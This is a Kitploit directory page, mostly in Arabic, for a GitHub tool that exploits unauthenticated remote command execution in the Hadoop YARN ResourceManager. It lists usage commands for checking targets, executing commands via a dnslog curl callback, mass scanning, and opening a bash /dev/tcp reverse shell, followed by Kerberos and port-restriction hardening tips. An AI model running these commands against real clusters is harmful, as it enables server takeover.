Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Hadoop-Yarn-ResourceManager-RCE — Hadoop Yan ResourceManager unauthorized RCE | Kitploit
أدوات/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
Vulnerability ScannersVulnerability AnalysisExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3914منذ 4 سنواتتمت المراجعة من قبل Kitploit

أثر الثغرة

كانت هناك ثغرة وصول غير مصرح به في مكوّن ResourceManager الخاص بـ Hadoop yarn. هذه الثغرة كانت موجودة في Hadoop yarn، المكوّن الأساسي لـ Hadoop. نظرًا لأن Hadoop yarn يفتح خدمة RPC للجمهور افتراضيًا، يمكن لمهاجم عن بُعد استغلال هذه الثغرة غير المصرح بها وتنفيذ أوامر عشوائية عبر خدمة RPC، مما يتيح له السيطرة على الخادم المستهدف. نظرًا لحالة الخطر العالية والضرر الكبير لهذه الثغرة، وحقيقة أن التفاصيل قد تم الكشف عنها واستغلالها من قبل الجهات المعادية، يُنصح جميع المستخدمين الذين يستخدمون Apache Hadoop بإجراء الفحص الذاتي واتخاذ التدابير الأمنية في الوقت المناسب.

المنتج المتأثر

Apache Hadoop Yarn *

فحص الثغرة

الاستخدام الأساسي

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

فحص الثغرة

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

تنفيذ الأوامر

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

الفحص الجماعي

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

شل عكسي

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

مراجع

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

نصائح الأمان

  1. قم بتمكين مصادقة Kerberos لمنع الوصول غير المصرح به.
root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>
  1. امنع العناوين الخارجية من الوصول إلى المنافذ المتعلقة بخدمة RPC الخاصة بـ Hadoop، أو قم بتكوينها لتكون مفتوحة فقط للعناوين الموثوقة.

إعلان رسمي: لا تستخدم هذه الأداة في العمليات غير القانونية. تُستخدم هذه الأداة فقط لإجراء الفحص الذاتي الأمني من قبل موظفي الطرف الأول وموظفي الطرف الثاني. إذا استخدمها المستخدم بشكل غير قانوني، فإن المسؤولية القانونية تقع على عاتق المستخدم!!!

تنزيل الأداة